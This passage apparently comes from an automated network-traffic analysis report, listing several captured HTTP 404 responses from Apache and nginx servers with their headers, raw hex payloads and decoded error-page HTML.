66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 29 Nov 2022 09:35:21 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 29 Nov 2022 09:35:24 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 29 Nov 2022 09:35:26 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:35:42 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:35:45 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:35:47 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:35:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 02 Jan 2018 12:36:34 GMTETag: W/"6b40108-56e-561ca595b5880"Content-Encoding: gzipData Raw: 33 30 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 cd 8e d3 48 10 be e7 29 0a 5f b8 4c e2 84 24 fc ad 13 09 06 d0 8c b4 c0 81 e1 c0 b1 d3 2e c7 cd b4 dd a6 bb 3c 1e bf 23 97 7d 00 24 0b 88 14 10 19 cd 44 62 f7 ba d5 76 82 34 ec 68 b9 70 b0 e2 b6 ea fb ab aa 4e 74 74 f2 fc cf 79 74 f4 f4 d1 93 79 2f 22 45 1a e7 93 e1 04 5e 18 82 67 a6 cc 63 e8 c3 5f db cb 66 b3 fe bb 81 cd 0a 36 cd 97 cf ab 4d 13 85 5d 69 2f ca 90 04 a4 44 45 1f df 95 ea 6c 16 1c 9a 9c 30 a7 fe 49 5d 60 00 b2 3b cd 02 c2 73 0a 53 ca f4 1f 20 53 61 1d d2 ac 52 79 6c 2a d7 1f dd 99 8e 02 a6 d2 2a 3f 05 8b 7a 16 28 86 05 90 5a 4c 66 41 98 88 33 7f 9e 4e c7 77 13 f9 60 3c 19 e3 03 b1 18 0a 29 86 f7 46 e3 e9 64 78 7f 12 c7 63 29 07 5c 14 00 b1 2a e3 33 b1 c4 f0 bc df f1 84 d7 b8 5d 6a 2c c9 92 e0 f7 8b 84 bb 36 3e 7e f9 e4 0d ff 48 0e 8e 96 5f c4 4e c5 b7 c9 3d 0c c3 4c a6 c6 d1 c0 96 61 30 8f 54 b6 04 67 25 7b c8 a4 36 4b f3 4b 0b 6f 8b 65 00 42 73 4f df 37 5f bf 5f 5c 6d 03 58 18 1b a3 9d 05 43 e6 0b c5 3c 5a d8 f6 e9 45 47 a3 eb d3 f4 5f 0f 6f 1a 27 17 b6 88 0f db 06 ae f6 05 57 9f 56 9b d5 e5 fa f2 e2 63 b3 69 a0 f9 b8 bd f8 d6 6c d7 ff ac ae be ae e1 7f 43 79 57 eb cd a7 8b 6f b0 b3 e8 5d 71 7f 76 8d 09 db a5 eb 45 b7 fa fd 1e 00 6f d8 eb 3c e1 a1 94 b9 20 d4 f5 01 3c 57 d2 1a 67 12 82 54 38 10 71 8c 31 08 90 1a cf d0 42 8e 55 07 0a 12 14 54 5a 5e 32 32 70 ec 5b 9d 23 c1 d3 f3 42 1b 8b 76 00 c7 09 50 8a e0 17 0f 4c d2 61 44 0e 68 ad b1 b7 1d 64 e8 1c 0f 10 94 83 80 8c 01 97 09 ad 83 03 70 05 4a 95 28 c9 a7 ba 03 69 ae 64 2a c6 4e 47 77 60 51 13 ba 83 ff 0a f2 76 b1 9b dc 75 18 45 0e 4c b5 53 db 6b 0d e0 8d 29 41 32 91 af f4 94 de 59 72 d0 41 16 7e 27 89 9d 15 cc 44 35 90 55 f2 b4 f6 e1 12 be 28 e0 2a 45 32 05 ef 0b e3 5d 07 d8 b3 a5 eb 1a 2e 18 c0 89 27 ce 50 e4 ec d3 24 7c 07 4b be 6f 3b 95 56 b4 bd 03 3f e1 40 58 04 5e 59 c7 61 62 4e 09 31 26 a2 d4 34 e8 70 c7 c7 af 78 e9 2a 51 bb 7d d0 9f f1 2d b3 27 d1 26 5f 76 20 cc 4d b9 4c 7d 84 4c 9c e2 0d 3d 4b 45 51 d4 de 30 76 80 ca d8 53 61 db ff 1d f5 a3 11 4e 65 85 c6 87 50 88 b8 9d 68 ab db d5 ef 87 c8 bd 49 79 45 16 6a c9 69 b3 8c 2f 1e 68 c5 8a 94 32 0d cb 17 a5 4b b9 b9 1d c8 f8 35 f2 44 89 3a 43 48 59 cc 27 16 ac 49 15 6a fe d4 8e 18 32 95 ab ac cc 76 f9 5f fe e8 63 1b 94 c7 84 e7 42 92 ae a1 f2 b9 6b 53 de e6 e8 16 45 ac f6 e9 ad 5a a6 04 b9 a9 3a 8a fe bc f7 2f 4f 20 91 d7 6e 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 309TH)_L$.<#}$Dbv4hpNttyty/"E^gc_f6M]i/DEl0I]`;sS SaRyl*?z(ZLfA3Nw`<)Fdxc)\3]j,6>~H_N=La0Tg%{6KKoeBsO7__\mXC<Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:35:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 02 Jan 2018 12:36:34 GMTETag: W/"6b40108-56e-561ca595b5880"Content-Encoding: gzipData Raw: 33 30 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 cd 8e d3 48 10 be e7 29 0a 5f b8 4c e2 84 24 fc ad 13 09 06 d0 8c b4 c0 81 e1 c0 b1 d3 2e c7 cd b4 dd a6 bb 3c 1e bf 23 97 7d 00 24 0b 88 14 10 19 cd 44 62 f7 ba d5 76 82 34 ec 68 b9 70 b0 e2 b6 ea fb ab aa 4e 74 74 f2 fc cf 79 74 f4 f4 d1 93 79 2f 22 45 1a e7 93 e1 04 5e 18 82 67 a6 cc 63 e8 c3 5f db cb 66 b3 fe bb 81 cd 0a 36 cd 97 cf ab 4d 13 85 5d 69 2f ca 90 04 a4 44 45 1f df 95 ea 6c 16 1c 9a 9c 30 a7 fe 49 5d 60 00 b2 3b cd 02 c2 73 0a 53 ca f4 1f 20 53 61 1d d2 ac 52 79 6c 2a d7 1f dd 99 8e 02 a6 d2 2a 3f 05 8b 7a 16 28 86 05 90 5a 4c 66 41 98 88 33 7f 9e 4e c7 77 13 f9 60 3c 19 e3 03 b1 18 0a 29 86 f7 46 e3 e9 64 78 7f 12 c7 63 29 07 5c 14 00 b1 2a e3 33 b1 c4 f0 bc df f1 84 d7 b8 5d 6a 2c c9 92 e0 f7 8b 84 bb 36 3e 7e f9 e4 0d ff 48 0e 8e 96 5f c4 4e c5 b7 c9 3d 0c c3 4c a6 c6 d1 c0 96 61 30 8f 54 b6 04 67 25 7b c8 a4 36 4b f3 4b 0b 6f 8b 65 00 42 73 4f df 37 5f bf 5f 5c 6d 03 58 18 1b a3 9d 05 43 e6 0b c5 3c 5a d8 f6 e9 45 47 a3 eb d3 f4 5f 0f 6f 1a 27 17 b6 88 0f db 06 ae f6 05 57 9f 56 9b d5 e5 fa f2 e2 63 b3 69 a0 f9 b8 bd f8 d6 6c d7 ff ac ae be ae e1 7f 43 79 57 eb cd a7 8b 6f b0 b3 e8 5d 71 7f 76 8d 09 db a5 eb 45 b7 fa fd 1e 00 6f d8 eb 3c e1 a1 94 b9 20 d4 f5 01 3c 57 d2 1a 67 12 82 54 38 10 71 8c 31 08 90 1a cf d0 42 8e 55 07 0a 12 14 54 5a 5e 32 32 70 ec 5b 9d 23 c1 d3 f3 42 1b 8b 76 00 c7 09 50 8a e0 17 0f 4c d2 61 44 0e 68 ad b1 b7 1d 64 e8 1c 0f 10 94 83 80 8c 01 97 09 ad 83 03 70 05 4a 95 28 c9 a7 ba 03 69 ae 64 2a c6 4e 47 77 60 51 13 ba 83 ff 0a f2 76 b1 9b dc 75 18 45 0e 4c b5 53 db 6b 0d e0 8d 29 41 32 91 af f4 94 de 59 72 d0 41 16 7e 27 89 9d 15 cc 44 35 90 55 f2 b4 f6 e1 12 be 28 e0 2a 45 32 05 ef 0b e3 5d 07 d8 b3 a5 eb 1a 2e 18 c0 89 27 ce 50 e4 ec d3 24 7c 07 4b be 6f 3b 95 56 b4 bd 03 3f e1 40 58 04 5e 59 c7 61 62 4e 09 31 26 a2 d4 34 e8 70 c7 c7 af 78 e9 2a 51 bb 7d d0 9f f1 2d b3 27 d1 26 5f 76 20 cc 4d b9 4c 7d 84 4c 9c e2 0d 3d 4b 45 51 d4 de 30 76 80 ca d8 53 61 db ff 1d f5 a3 11 4e 65 85 c6 87 50 88 b8 9d 68 ab db d5 ef 87 c8 bd 49 79 45 16 6a c9 69 b3 8c 2f 1e 68 c5 8a 94 32 